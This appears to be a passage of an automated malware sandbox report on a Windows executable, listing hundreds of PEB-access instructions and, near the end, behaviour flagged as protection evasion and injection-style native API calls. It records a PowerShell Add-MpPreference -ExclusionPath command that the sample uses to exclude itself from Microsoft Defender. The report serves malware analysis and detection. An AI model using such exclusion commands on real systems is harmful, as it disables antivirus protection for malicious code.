                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FE6F2 mov eax, dword ptr fs:[00000030h] | 9_2_011FE6F2
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FE6F2 mov eax, dword ptr fs:[00000030h] | 9_2_011FE6F2
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FE6F2 mov eax, dword ptr fs:[00000030h] | 9_2_011FE6F2
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0120892A mov eax, dword ptr fs:[00000030h] | 9_2_0120892A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0121892B mov eax, dword ptr fs:[00000030h] | 9_2_0121892B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01178918 mov eax, dword ptr fs:[00000030h] | 9_2_01178918
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01178918 mov eax, dword ptr fs:[00000030h] | 9_2_01178918
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FE908 mov eax, dword ptr fs:[00000030h] | 9_2_011FE908
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FE908 mov eax, dword ptr fs:[00000030h] | 9_2_011FE908
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0120C912 mov eax, dword ptr fs:[00000030h] | 9_2_0120C912
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01224978 mov eax, dword ptr fs:[00000030h] | 9_2_01224978
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01224978 mov eax, dword ptr fs:[00000030h] | 9_2_01224978
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0120C97C mov eax, dword ptr fs:[00000030h] | 9_2_0120C97C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01200946 mov eax, dword ptr fs:[00000030h] | 9_2_01200946
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011C096E mov eax, dword ptr fs:[00000030h] | 9_2_011C096E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011C096E mov edx, dword ptr fs:[00000030h] | 9_2_011C096E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011C096E mov eax, dword ptr fs:[00000030h] | 9_2_011C096E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A6962 mov eax, dword ptr fs:[00000030h] | 9_2_011A6962
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A6962 mov eax, dword ptr fs:[00000030h] | 9_2_011A6962
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A6962 mov eax, dword ptr fs:[00000030h] | 9_2_011A6962
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_012089B3 mov esi, dword ptr fs:[00000030h] | 9_2_012089B3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_012089B3 mov eax, dword ptr fs:[00000030h] | 9_2_012089B3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_012089B3 mov eax, dword ptr fs:[00000030h] | 9_2_012089B3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011809AD mov eax, dword ptr fs:[00000030h] | 9_2_011809AD
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011809AD mov eax, dword ptr fs:[00000030h] | 9_2_011809AD
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h] | 9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h] | 9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h] | 9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h] | 9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h] | 9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h] | 9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h] | 9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h] | 9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h] | 9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h] | 9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h] | 9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h] | 9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h] | 9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0120E9E0 mov eax, dword ptr fs:[00000030h] | 9_2_0120E9E0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118A9D0 mov eax, dword ptr fs:[00000030h] | 9_2_0118A9D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118A9D0 mov eax, dword ptr fs:[00000030h] | 9_2_0118A9D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118A9D0 mov eax, dword ptr fs:[00000030h] | 9_2_0118A9D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118A9D0 mov eax, dword ptr fs:[00000030h] | 9_2_0118A9D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118A9D0 mov eax, dword ptr fs:[00000030h] | 9_2_0118A9D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118A9D0 mov eax, dword ptr fs:[00000030h] | 9_2_0118A9D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B49D0 mov eax, dword ptr fs:[00000030h] | 9_2_011B49D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_012169C0 mov eax, dword ptr fs:[00000030h] | 9_2_012169C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B29F9 mov eax, dword ptr fs:[00000030h] | 9_2_011B29F9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B29F9 mov eax, dword ptr fs:[00000030h] | 9_2_011B29F9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0124A9D3 mov eax, dword ptr fs:[00000030h] | 9_2_0124A9D3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0122483A mov eax, dword ptr fs:[00000030h] | 9_2_0122483A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0122483A mov eax, dword ptr fs:[00000030h] | 9_2_0122483A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BA830 mov eax, dword ptr fs:[00000030h] | 9_2_011BA830
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A2835 mov eax, dword ptr fs:[00000030h] | 9_2_011A2835
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A2835 mov eax, dword ptr fs:[00000030h] | 9_2_011A2835
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A2835 mov eax, dword ptr fs:[00000030h] | 9_2_011A2835
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A2835 mov ecx, dword ptr fs:[00000030h] | 9_2_011A2835
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A2835 mov eax, dword ptr fs:[00000030h] | 9_2_011A2835
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A2835 mov eax, dword ptr fs:[00000030h] | 9_2_011A2835
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0120C810 mov eax, dword ptr fs:[00000030h] | 9_2_0120C810
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01184859 mov eax, dword ptr fs:[00000030h] | 9_2_01184859
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01184859 mov eax, dword ptr fs:[00000030h] | 9_2_01184859
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B0854 mov eax, dword ptr fs:[00000030h] | 9_2_011B0854
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01216870 mov eax, dword ptr fs:[00000030h] | 9_2_01216870
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01216870 mov eax, dword ptr fs:[00000030h] | 9_2_01216870
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0120E872 mov eax, dword ptr fs:[00000030h] | 9_2_0120E872
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0120E872 mov eax, dword ptr fs:[00000030h] | 9_2_0120E872
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01192840 mov ecx, dword ptr fs:[00000030h] | 9_2_01192840
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01180887 mov eax, dword ptr fs:[00000030h] | 9_2_01180887
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0120C89D mov eax, dword ptr fs:[00000030h] | 9_2_0120C89D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0124A8E4 mov eax, dword ptr fs:[00000030h] | 9_2_0124A8E4
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011AE8C0 mov eax, dword ptr fs:[00000030h] | 9_2_011AE8C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BC8F9 mov eax, dword ptr fs:[00000030h] | 9_2_011BC8F9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BC8F9 mov eax, dword ptr fs:[00000030h] | 9_2_011BC8F9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h] | 9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h] | 9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h] | 9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h] | 9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h] | 9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h] | 9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h] | 9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h] | 9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h] | 9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01248B28 mov eax, dword ptr fs:[00000030h] | 9_2_01248B28
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01248B28 mov eax, dword ptr fs:[00000030h] | 9_2_01248B28
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011AEB20 mov eax, dword ptr fs:[00000030h] | 9_2_011AEB20
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011AEB20 mov eax, dword ptr fs:[00000030h] | 9_2_011AEB20
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01228B42 mov eax, dword ptr fs:[00000030h] | 9_2_01228B42
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01216B40 mov eax, dword ptr fs:[00000030h] | 9_2_01216B40
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01216B40 mov eax, dword ptr fs:[00000030h] | 9_2_01216B40
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0124AB40 mov eax, dword ptr fs:[00000030h] | 9_2_0124AB40
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01234B4B mov eax, dword ptr fs:[00000030h] | 9_2_01234B4B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01234B4B mov eax, dword ptr fs:[00000030h] | 9_2_01234B4B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0117CB7E mov eax, dword ptr fs:[00000030h] | 9_2_0117CB7E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0122EB50 mov eax, dword ptr fs:[00000030h] | 9_2_0122EB50
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01234BB0 mov eax, dword ptr fs:[00000030h] | 9_2_01234BB0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01234BB0 mov eax, dword ptr fs:[00000030h] | 9_2_01234BB0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01190BBE mov eax, dword ptr fs:[00000030h] | 9_2_01190BBE
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01190BBE mov eax, dword ptr fs:[00000030h] | 9_2_01190BBE
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0120CBF0 mov eax, dword ptr fs:[00000030h] | 9_2_0120CBF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A0BCB mov eax, dword ptr fs:[00000030h] | 9_2_011A0BCB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A0BCB mov eax, dword ptr fs:[00000030h] | 9_2_011A0BCB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A0BCB mov eax, dword ptr fs:[00000030h] | 9_2_011A0BCB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01180BCD mov eax, dword ptr fs:[00000030h] | 9_2_01180BCD
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01180BCD mov eax, dword ptr fs:[00000030h] | 9_2_01180BCD
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01180BCD mov eax, dword ptr fs:[00000030h] | 9_2_01180BCD
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011AEBFC mov eax, dword ptr fs:[00000030h] | 9_2_011AEBFC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01188BF0 mov eax, dword ptr fs:[00000030h] | 9_2_01188BF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01188BF0 mov eax, dword ptr fs:[00000030h] | 9_2_01188BF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01188BF0 mov eax, dword ptr fs:[00000030h] | 9_2_01188BF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0122EBD0 mov eax, dword ptr fs:[00000030h] | 9_2_0122EBD0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BCA38 mov eax, dword ptr fs:[00000030h] | 9_2_011BCA38
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A4A35 mov eax, dword ptr fs:[00000030h] | 9_2_011A4A35
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011A4A35 mov eax, dword ptr fs:[00000030h] | 9_2_011A4A35
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0120CA11 mov eax, dword ptr fs:[00000030h] | 9_2_0120CA11
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011AEA2E mov eax, dword ptr fs:[00000030h] | 9_2_011AEA2E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BCA24 mov eax, dword ptr fs:[00000030h] | 9_2_011BCA24
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01190A5B mov eax, dword ptr fs:[00000030h] | 9_2_01190A5B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01190A5B mov eax, dword ptr fs:[00000030h] | 9_2_01190A5B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0122EA60 mov eax, dword ptr fs:[00000030h] | 9_2_0122EA60
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01186A50 mov eax, dword ptr fs:[00000030h] | 9_2_01186A50
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01186A50 mov eax, dword ptr fs:[00000030h] | 9_2_01186A50
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01186A50 mov eax, dword ptr fs:[00000030h] | 9_2_01186A50
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01186A50 mov eax, dword ptr fs:[00000030h] | 9_2_01186A50
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01186A50 mov eax, dword ptr fs:[00000030h] | 9_2_01186A50
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01186A50 mov eax, dword ptr fs:[00000030h] | 9_2_01186A50
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01186A50 mov eax, dword ptr fs:[00000030h] | 9_2_01186A50
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FCA72 mov eax, dword ptr fs:[00000030h] | 9_2_011FCA72
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011FCA72 mov eax, dword ptr fs:[00000030h] | 9_2_011FCA72
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BCA6F mov eax, dword ptr fs:[00000030h] | 9_2_011BCA6F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BCA6F mov eax, dword ptr fs:[00000030h] | 9_2_011BCA6F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BCA6F mov eax, dword ptr fs:[00000030h] | 9_2_011BCA6F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B8A90 mov edx, dword ptr fs:[00000030h] | 9_2_011B8A90
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h] | 9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h] | 9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h] | 9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h] | 9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h] | 9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h] | 9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h] | 9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h] | 9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h] | 9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01254A80 mov eax, dword ptr fs:[00000030h] | 9_2_01254A80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01188AA0 mov eax, dword ptr fs:[00000030h] | 9_2_01188AA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01188AA0 mov eax, dword ptr fs:[00000030h] | 9_2_01188AA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011D6AA4 mov eax, dword ptr fs:[00000030h] | 9_2_011D6AA4
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01180AD0 mov eax, dword ptr fs:[00000030h] | 9_2_01180AD0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B4AD0 mov eax, dword ptr fs:[00000030h] | 9_2_011B4AD0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B4AD0 mov eax, dword ptr fs:[00000030h] | 9_2_011B4AD0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011D6ACC mov eax, dword ptr fs:[00000030h] | 9_2_011D6ACC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011D6ACC mov eax, dword ptr fs:[00000030h] | 9_2_011D6ACC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011D6ACC mov eax, dword ptr fs:[00000030h] | 9_2_011D6ACC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BAAEE mov eax, dword ptr fs:[00000030h] | 9_2_011BAAEE
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011BAAEE mov eax, dword ptr fs:[00000030h] | 9_2_011BAAEE
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01208D20 mov eax, dword ptr fs:[00000030h] | 9_2_01208D20
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_011B4D1D mov eax, dword ptr fs:[00000030h] | 9_2_011B4D1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01176D10 mov eax, dword ptr fs:[00000030h] | 9_2_01176D10
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01176D10 mov eax, dword ptr fs:[00000030h] | 9_2_01176D10
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01176D10 mov eax, dword ptr fs:[00000030h] | 9_2_01176D10
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0119AD00 mov eax, dword ptr fs:[00000030h] | 9_2_0119AD00
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0119AD00 mov eax, dword ptr fs:[00000030h] | 9_2_0119AD00
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_0119AD00 mov eax, dword ptr fs:[00000030h] | 9_2_0119AD00
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01238D10 mov eax, dword ptr fs:[00000030h] | 9_2_01238D10
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01238D10 mov eax, dword ptr fs:[00000030h] | 9_2_01238D10
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Code function: 9_2_01180D59 mov eax, dword ptr fs:[00000030h] | 9_2_01180D59
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\C6Abn5cBei.exe -- Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe"
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe -- Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zdDlscHlw.exe"
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtCreateMutant: Direct from: 0x774635CC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtWriteVirtualMemory: Direct from: 0x77462E3C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtMapViewOfSection: Direct from: 0x77462D1C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtResumeThread: Direct from: 0x774636AC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtProtectVirtualMemory: Direct from: 0x77462F9C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtSetInformationProcess: Direct from: 0x77462C5C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtTerminateThread: Direct from: 0x77457B2E
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtNotifyChangeKey: Direct from: 0x77463C2C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtAllocateVirtualMemory: Direct from: 0x77462BFC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtQueryInformationProcess: Direct from: 0x77462C26
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtResumeThread: Direct from: 0x77462FBC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtReadFile: Direct from: 0x77462ADC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtQuerySystemInformation: Direct from: 0x77462DFC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtDelayExecution: Direct from: 0x77462DDC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtAllocateVirtualMemory: Direct from: 0x77463C9C
